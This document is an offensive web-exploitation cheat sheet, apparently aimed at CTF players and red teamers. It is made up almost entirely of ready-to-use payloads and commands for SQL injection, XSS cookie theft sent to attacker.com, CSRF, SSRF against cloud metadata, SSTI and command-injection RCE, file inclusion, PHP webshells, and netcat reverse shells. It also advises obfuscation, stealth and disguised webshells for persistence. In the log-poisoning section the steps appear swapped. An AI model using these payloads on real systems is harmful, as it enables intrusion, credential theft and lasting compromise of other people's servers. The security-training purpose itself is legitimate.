DeepDive

Web Exploitation Deep Dive — Hacking the Web Like a Surgeon

The web is the frontline of hacking. From SQL injections and XSS payloads to SSRF, SSTI, and Remote Code Execution (RCE), web exploitation lets you turn weak input validation into full system compromise. This guide equips you with professional-grade offensive techniques and CTF-ready workflows.

I. 🧩 Core Concepts

II. ⚙️ Reconnaissance and Fingerprinting

🧠 Identify Technology Stack

whatweb http://target.com

🧩 Directory Bruteforce

gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt

⚙️ Parameter Discovery

ffuf -u http://target.com/page.php?FUZZ=test -w /usr/share/wordlists/params.txt

🧠 Common Headers to Check

X-Powered-By
Server
Cookie
Set-Cookie

III. 💣 SQL Injection (SQLi)

🧩 Basic Detection

Append a single quote (') and observe for SQL errors.

Example:

?id=1'
?id=1 or 1=1--

⚙️ Automated Scanning

sqlmap -u "http://target.com/page.php?id=1" --batch --dbs

🧠 Manual Exploitation

?id=1 UNION SELECT 1,2,3--
?id=-1 UNION SELECT 1,@@version,3--

💣 Dump Credentials

sqlmap -u "http://target.com/login.php" --dump -D users -T creds

⚙️ Bypass Authentication

' OR '1'='1'-- -
' OR 1=1#
admin'--

IV. ⚙️ Cross-Site Scripting (XSS)

🧠 Reflected XSS

<script>alert(1)</script>
"><svg onload=alert(1)>

💣 Stored XSS

<script>new Image().src='http://attacker.com/'+document.cookie</script>

⚙️ DOM-Based XSS

<script>eval(location.hash.slice(1))</script>
#alert(1)

🧠 XSS with Event Handlers

<img src=x onerror=alert(1337)>
<svg onload=prompt(document.domain)>

V. 🧩 Cross-Site Request Forgery (CSRF)

⚙️ Basic Concept

Forces a logged-in user to perform actions they didn’t intend.

💣 CSRF Exploit Example

<form action="http://victim.com/change_password.php" method="POST">
  <input type="hidden" name="password" value="hacked123">
  <input type="submit">
</form>
<script>document.forms[0].submit()</script>

VI. 🧠 Server-Side Request Forgery (SSRF)

⚙️ Basic Payloads

http://target.com/fetch?url=http://127.0.0.1:80
http://target.com/fetch?url=file:///etc/passwd

💣 Internal Service Enumeration

curl "http://target.com/fetch?url=http://169.254.169.254/latest/meta-data/"

⚙️ Bypass Filters

http://127.1/
http://[::1]/
http://[email protected]/

VII. ⚙️ Server-Side Template Injection (SSTI)

🧠 Identify Framework

{{7*7}}  → Jinja2 (Python)
<%= 7*7 %>  → JSP / Ruby ERB
${7*7}  → Spring / Thymeleaf

💣 Exploit Examples

Jinja2 (Python Flask)

{{config.__class__.__init__.__globals__['os'].popen('id').read()}}

Twig (PHP)

{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}

VIII. 💣 Remote Code Execution (RCE)

⚙️ Command Injection

ping -c 4 10.10.14.2; cat /etc/passwd

🧠 Bypass Filters

|| ls
|cat /etc/passwd|
$(id)
`whoami`

⚙️ URL Encoded Payloads

%3bcat%20/etc/passwd
%26id

IX. 🧩 Local File Inclusion (LFI)

⚙️ Basic Payloads

?page=../../../../etc/passwd
?page=php://filter/convert.base64-encode/resource=index.php

🧠 Log Poisoning for RCE

1. Inject PHP payload into logs:

   Copy

   curl "http://target.com/index.php?page=/var/log/apache2/access.log&cmd=id"

2. Access via LFI to execute:

   Copy

   <?php system($_GET['cmd']); ?>

X. ⚙️ Remote File Inclusion (RFI)

💣 Payload

?page=http://attacker.com/shell.txt

shell.txt:

<?php system($_GET['cmd']); ?>

XI. 🧠 Deserialization Vulnerabilities

⚙️ PHP Example

<?php
class Evil {
  function __destruct() {
    system('id');
  }
}
echo base64_encode(serialize(new Evil()));
?>

💣 Java Example

Use ysoserial:

java -jar ysoserial.jar CommonsCollections1 "nc -e /bin/sh 10.10.14.2 4444" | base64

XII. ⚙️ File Upload Exploitation

🧩 Upload Shell

<?php system($_GET['cmd']); ?>

🧠 Bypass Filters

• Rename extensions: .phtml, .php3, .phar

• Double extensions: file.php.jpg

• Null byte trick: file.php%00.jpg

• Use content-type spoofing:

  Copy

  Content-Type: image/jpeg

💣 Execute

http://target.com/uploads/shell.php?cmd=id

XIII. ⚙️ Authentication & Logic Bypasses

XIV. 🧠 Information Disclosure

/.git/HEAD
/.env
/config.php.bak
/backup.zip
/index.old

Extract secrets:

grep -E "DB_PASS|SECRET" .env

XV. ⚙️ WebShell Arsenal

XVI. 💣 Post-Exploitation on Web Servers

🧠 Privilege Escalation

sudo -l
find / -perm -4000 -type f 2>/dev/null

⚙️ Lateral Movement

ssh -i id_rsa [email protected]

💾 Looting Credentials

cat /var/www/html/config.php
cat ~/.bash_history

XVII. ⚙️ Real-World Attack Chain Example

# 1. Discover parameter
http://target.com/profile.php?id=1

# 2. SQLi → Extract creds
?id=-1 UNION SELECT 1,username,password FROM users--

# 3. Login as admin
# 4. Upload PHP shell
# 5. Execute
curl http://target.com/uploads/shell.php?cmd=id
# 6. Reverse shell
curl http://target.com/uploads/shell.php?cmd=nc -e /bin/bash 10.10.14.2 4444

XVIII. 🧠 Automation for CTFs

⚙️ Web Enum Script

#!/bin/bash
url=$1
gobuster dir -u $url -w /usr/share/wordlists/dirb/common.txt -t 50
ffuf -u $url/FUZZ -w /usr/share/wordlists/raft-large-files.txt
whatweb $url

💣 Python Exploit Skeleton

import requests
url = "http://target.com/vuln.php"
payload = "' UNION SELECT 1,@@version,3-- -"
r = requests.get(url, params={"id": payload})
print(r.text)

XIX. ⚔️ Pro Tips & Red Team Tricks

✅ Chaining Attacks

• SQLi → RCE via file write.

• XSS → cookie theft → session hijack.

• SSTI → reverse shell → local privilege escalation.

✅ Obfuscation

• Encode payloads (base64, urlencode).

• Replace keywords: system → syst\u0065m.

✅ Automation

• Integrate Burp Suite macros + Intruder for mass testing.

• Use sqlmap --os-shell for auto exploitation.

✅ Stealth

• Use custom headers:

  Copy

  X-Originating-IP: 127.0.0.1
  X-Forwarded-For: localhost

✅ Persistence

• Implant webshells under legitimate names: /uploads/cache.php, /img/.update.php.

XX. ⚙️ Quick Reference Table